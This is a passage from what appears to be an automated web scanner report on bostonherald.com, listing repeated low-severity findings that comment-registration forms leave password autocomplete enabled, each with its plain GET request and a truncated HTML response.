Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.8. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:25:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.9. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:42:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.10. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.11. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:48:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.12. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.13. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:07:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.14. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:21:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.15. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:11:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.16. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view.bg?articleid=1294599&format=comments&srvc=news&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.17. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.18. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 87974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.19. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
